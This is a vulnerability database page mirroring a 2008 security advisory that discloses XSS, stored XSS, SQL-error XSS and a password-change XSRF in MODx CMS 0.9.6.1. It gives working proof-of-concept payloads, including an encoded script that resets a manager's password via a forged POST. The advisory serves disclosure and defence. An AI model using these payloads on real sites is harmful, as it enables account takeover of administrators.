Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DSECRG-08-013.txt

🗓️ 08 Feb 2008 00:00:00Reported by Sh2kerrType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 38 Views

MODx CMS Multiple Security Vulnerabilities reported by DSecRG, including Linked XSS, SiXSS, Stored XSS, and Change User Password XSRF. Exploits confirmed. No vendor solution or response. Vulnerabilities reported on 11.01.2008, with a public advisory issued on 07.02.2008 by Alexandr Polyakov and Stas Svistunovich

Code
`  
  
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-013  
  
  
Application: MODx CMS  
Versions Affected: 0.9.6.1, 0.9.6.1p1  
Vendor URL: http://modxcms.com/  
Bugs: XSS, SiXSS, stored XSS, Change User Password XSRF Vulnerability.  
Exploits: YES  
Reported: 11.01.2008  
Vendor response: 11.01.2008  
Updated Report: 29.01.2008  
Vendor response: none  
Solution: none  
Date of Public Advisory: 07.02.2008  
Authors: Alexandr Polyakov, Stas Svistunovich  
Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)  
  
  
  
Description  
***********  
  
MODx system has multiple security vulnerabilities:  
  
1. Linked XSS  
2. Linked SiXSS  
3. XSS in POST  
4. Stored XSS in POST  
5. Change User Password XSRF Vulnerability  
  
  
  
Details  
*******  
  
  
1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string.  
  
  
1.1 Linked XSS vulnerability found in manager/index.php. GET parameter "search"  
  
Search string is available in pages:  
  
http://[server]/[installdir]/manager/index.php?a=75  
  
http://[server]/[installdir]/manager/index.php?a=84  
  
http://[server]/[installdir]/manager/index.php?a=99  
  
http://[server]/[installdir]/manager/index.php?a=106  
  
http://[server]/[installdir]/manager/index.php?a=114  
  
  
Example:  
  
http://[server]/[installdir]/manager/index.php?a=75&search="><IMG SRC="javascript:alert('DSecRG XSS')  
  
http://[server]/[installdir]/manager/index.php?a=84&search="><IMG SRC="javascript:alert('DSecRG XSS')  
  
  
1.2 Linked XSS vulnerability found in index.php. GET parameter "highlight"  
  
Example:  
  
http://[server]/[installdir]/index.php?searched=modx&highlight="><IMG SRC="javascript:alert('DSecRG XSS')  
  
------------------------------------------------------------------------------  
  
  
2. Multiple linked SiXSS vulnerabilities found. Attacker can inject XSS code in SQL Error.  
  
  
2.1 Vulnerability found in script manager/index.php. GET parameter "a"  
  
Example:  
  
http://[server]/[installdir]/manager/index.php?a='<img src="javascript:alert('DSecRG XSS')">  
  
  
2.2 Vulnerability found in script index.php. GET parameter "id"  
  
Example:  
  
http://[server]/[installdir]/index.php?id='<img src="javascript:alert('DSecRG XSS')">  
  
-------------------------------------------------------------------------------  
  
  
3. XSS in POST, attacker can inject XSS in POST parameter  
  
  
3.1 Vulnerability found in script index-ajax.php.   
  
POST parameters "docgrp" and "moreResultsPage".  
  
Example:  
  
moreResultsPage = "><IMG SRC="javascript:alert('DSecRG XSS')">  
  
  
3.2 Vulnerability found in script index.php.   
  
POST parameters "email", "name" and "parent".  
  
Example:  
  
name = " style="background:url(javascript:alert('DSecRG XSS'))  
  
-------------------------------------------------------------------------------  
  
  
4. Vulnerability found in script manager/index.php?a=10   
  
POST parameters "messagesubject" and "messagebody".  
  
Attacker can comprose message with script code in subject and message body.  
  
-------------------------------------------------------------------------------  
  
  
5. Change User Password XSRF Vulnerability  
  
Previous password not required to set a new password.  
  
Using XSS vulnerabilities, attacker can include following code to change user password:  
  
_______________________________________________________________________________  
  
<IMG%20SRC=`javascript:var%20objHTTP%20=%20new%20ActiveXObject('MSXML2.XMLHTTP');%20objHTTP.open('POST',"http://[server]/[installdir]/manager/index.php?a=34",false);%20objHTTP.setRequestHeader('Content-Type',%20'application/x-www-form-urlencoded');%20objHTTP.send("pass1=123456%26pass2=123456");`>  
_______________________________________________________________________________  
  
  
  
About  
*****  
  
Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.  
  
  
Contact: research [at] dsec [dot] ru  
http://www.dsec.ru (in Russian)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4
modx cmssecurity vulnerabilitiesdsecrgxsssixssstored xsschange user password xsrfexploitspublic advisoryit security company
38